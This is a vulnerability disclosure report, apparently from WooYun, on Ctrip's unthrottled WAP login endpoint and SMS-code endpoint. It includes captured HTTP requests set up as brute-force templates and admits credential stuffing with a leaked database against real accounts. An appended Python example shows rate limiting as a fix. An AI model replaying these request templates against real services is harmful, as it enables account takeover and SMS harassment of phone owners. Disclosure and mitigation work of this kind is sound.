
Ctrip: an endpoint flaw allows credential stuffing (partial data tested) and SMS bombing

2014-12-26 14:00

BUG 1:

Affected endpoint: https://accounts.ctrip.com/globalwap/account/login/

Essentially all of the other countries' WAP login pages authenticate through this endpoint, but it imposes no restrictions at all.



Packet captured during login:

Code:
POST /globalwap/account/login/ HTTP/1.1
Host: accounts.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://accounts.ctrip.com/globalwap/account/login/
Cookie: _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1222595445370.18yv31.1.1415607878326.1415670913381.3.426; _jzqco=%7C%7C%7C%7C1415599563950%7C1.1614112599.1415595504733.1415670919253.1415671025719.1415670919253.1415671025719.0.0.0.82.82; __zpspc=9.8.1415670919.1415671025.2%231%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415611614.1415670919.2; __utmz=1.1415611614.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.10922190.1415595506; LoginStatus=1%7czfhtiysc15im2huhnfiy1jnq480123%2c; Union=AllianceID=10530&SID=333189&OUID=000401app-96; Session=SmartLinkCode=222&SmartLinkKeyWord=&SmartLinkQuary=&SmartLinkHost=&SmartLinkLanguage=zh; zdata=zdata=fbtJpBv9C0ehaHww5dt8ARz60iM=; bid=bid=F; Customer=HAL=ctrip_en; TraceSessionEx=E787F98E577C6F54D7617658F2BF7756; login_type=0; login_uid=920F895E064728DE01786; StartCity_Pkg=PkgStartCity=28; OrderCountForMyCtrip=NotravelOrderCount=0&UnSubmitOrderCount=0&WaitAllReviewCount=0&WaitReviewOrderCount=0&WaitTravelOrderCount=0; WAPACHOST=de.ctrip.com; WAPACLANG=de; WAPACBACK=; __utma=1.1094494192215595506.1415611614.1415670919.2; __utmz=1.14152.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TracingUserFlag=ab461c5bfe83ae82; TracingErrorFlag=8b15a8523781bcb8; TracingUserFlag=; M133664218=6; _abtest_userid=17f7299f-dac6-459c-bb15-31af7030162d; ticket_ctrip=uoeOwviAJ6VQEgTNwLuTqSV9j/bS+aOP3Riia12QZsD2giTsSgRspVxT9gVTWKAxJ4HkD23fApqQ3QMOE5IaeSosSdj/B3EvFJUBZysEweyWgXWo5xMG3TUgsErz5oLdCian0tw0kzvhAoK6dTc3++u1ZIAWd2eGOCM0/XmfsdolFtzXzgHfvXqOHZ54WcGrBSN2WW2cLo6BkwPpv5BLIPjgaTJ/9x8PPkNgZ/uhrs82GPpb3azYzoaTdBIbzJW6VCLWjA==; corpid=; corpname=; CtripUserInfo=VipGrade=0&UserName=%c2b%aa%ce%fb%ce%fb%22eadMessageCount=0&U=A58C63A452CFD6E6F68962A25FC; AHeadUserInfo=VipGrade=0&UserName=%c2%aa%ce%fb%ce%fb%2f&NoReadMessageCount=0&U=A22CFD6E6F68962A25FC; auto=FD846C1C8F1C7AA17FEA3A964F6A499CB9D01E6030DD50D5; TicketSiteID=SiteID=1005; _bfs=1.7; _bfi=p1%32003%26p2%3D100111%21%3D426%26v2%3D425; __utmb=1.3.10.1415670919; __utmc=1; __utmt=1; NSC_WT_Bddpvout_443=ffffffff09001c7445525d5f4f58455e445a4a423660; NSC_WT_Bddpvout_80=ffffffff09001c2045525d5f4f58455e445a4a423660; NSC_WT_bddpvout.hmpcbm_443=ffffffff09001c2b45525d5f4f58455e445a4a423660; __utmb=1.3.10.1415670919; __utmc=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

UserName=§15555555555§&Password=§111111111§





Here a credential database leaked on the internet was used for credential stuffing; only a small portion of the data was used for testing, and the success rate was very high.





BUG 2:

The SMS endpoint is not rate limited, which allows SMS bombing:

Code:
GET /card/ajax/AjaxSendCommonSms.aspx?tempid=0.6355477791943324&typeKey=Register&uid=&mp=15555555555&sendType=1 HTTP/1.1
Host: b.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://b.ctrip.com/card/Register/Register3.aspx?phone=13888888888
Cookie: NSC_WT_C_80=fffddd2245525d5f4f58455e445a4a423660; ASP.NET_SessionId=5b3c5m4d0wbddddtgb3m; _abtest_=3341568a-da13-431e-8b37-57b88470cf4c; _bfa=1.1415595445370.18yv31.1.1415dd445370.1415595445370.1.5; _bfs=1.5; _bfi=p1%3D0%26ddd5%26v2%3D4; _jzqco=%7C%7C%7C%7C%7C1.1614112599.1415dd504733.1415595504733.1415595504734.1415dd95504733.1415595504734.0.0.0.1.1; __zpspc=9.1.1415595504.1415595504.1%234%7C%7C%7C%7C%7C%23; __utma=1.1094494190.1415595506.1415595506.1415595506.1; __utmb=1.2.10.1415595506; __utmc=1; __utmz=1.1415595506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; corpname=; CoCode=; CtripUserId=; corpid=; _ga=GA1.2.1094494190.1415595506; _gat=1
Connection: keep-alive



This SMS endpoint has no restrictions whatsoever.

Proof of vulnerability:

[Screenshot 1: proof of the login endpoint flaw (image not reproduced)]

[Screenshot 2: proof of the SMS endpoint flaw (image not reproduced)]

Fix recommendation:

Add a verification step to the login endpoint.
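The author's recommendation applies to both findings: the login endpoint (BUG 1) needs a budget on failed attempts, and the SMS endpoint (BUG 2) needs a budget per destination number. The following is an added example, not code from the original report or from Ctrip. It shows one sliding-window limiter keyed per account (or phone number) and per source IP, applied to both endpoints. The user table, IP addresses, injectable clock and limit values are constructed assumptions for the example; a production deployment would keep the counters in a shared store so the limits hold across all application servers.

```python
"""Server-side throttling for a login endpoint and an SMS-code endpoint.

Added example (assumptions: in-memory counters, a fake clock, a toy user
table). It is not code from the original report or from Ctrip.
"""
import hmac
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """At most `limit` recorded events per key within any `window` seconds."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock
        self._events = defaultdict(deque)

    def _prune(self, key):
        now = self.clock()
        q = self._events[key]
        while q and now - q[0] >= self.window:   # drop timestamps outside the window
            q.popleft()
        return q

    def remaining(self, key):
        return max(0, self.limit - len(self._prune(key)))

    def hit(self, key):
        self._prune(key).append(self.clock())


class FakeClock:
    """Deterministic clock so the example runs offline and repeatably."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


# Constructed user table for the example; real systems store password hashes.
USERS = {"alice": "correct-horse-battery-staple"}


def verify_password(username, password):
    stored = USERS.get(username, "")
    return username in USERS and hmac.compare_digest(stored.encode(), password.encode())


class LoginGuard:
    """Throttle per account (failures only) and per source IP (all attempts).

    Credential stuffing replays leaked (username, password) pairs, usually
    many accounts from few source IPs, so the per-IP budget catches it;
    repeated guesses against one account exhaust the per-account budget.
    Counting only failures against the account keeps a legitimate user who
    logs in normally from being locked out.
    """

    def __init__(self, clock, per_account=5, per_ip=50, window=15 * 60):
        self.per_account = SlidingWindowLimiter(per_account, window, clock)
        self.per_ip = SlidingWindowLimiter(per_ip, window, clock)

    def attempt(self, username, password, ip):
        if self.per_ip.remaining(ip) == 0 or self.per_account.remaining(username) == 0:
            return "throttled"            # refuse before evaluating the credentials
        self.per_ip.hit(ip)
        if verify_password(username, password):
            return "success"
        self.per_account.hit(username)    # only failures count against the account
        return "failure"


class SmsGuard:
    """Throttle verification SMS per destination number and per source IP."""

    def __init__(self, clock, per_number=3, per_ip=10, window=60 * 60):
        self.per_number = SlidingWindowLimiter(per_number, window, clock)
        self.per_ip = SlidingWindowLimiter(per_ip, window, clock)

    def request_code(self, phone, ip):
        if self.per_number.remaining(phone) == 0 or self.per_ip.remaining(ip) == 0:
            return False                  # handler answers with a generic "try later"
        self.per_number.hit(phone)
        self.per_ip.hit(ip)
        return True


if __name__ == "__main__":
    clock = FakeClock()
    guard = LoginGuard(clock, per_account=3)
    for _ in range(3):
        print(guard.attempt("alice", "wrong", "198.51.100.7"))          # failure
    print(guard.attempt("alice", USERS["alice"], "198.51.100.7"))       # throttled
    clock.advance(15 * 60)
    print(guard.attempt("alice", USERS["alice"], "198.51.100.7"))       # success
    sms = SmsGuard(clock)
    print([sms.request_code("15555555555", "198.51.100.7") for _ in range(4)])
```

The two endpoints share the limiter but differ in what they key on: the login guard counts failures per account and all attempts per IP, while the SMS guard counts every send per phone number, since each send costs money and annoys the recipient regardless of who asked for it. Returning "throttled" before the password is even checked keeps the throttled path cheap and avoids leaking whether the account exists.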


Source: www.wooyun.org/bugs/wooyun-2014-082848
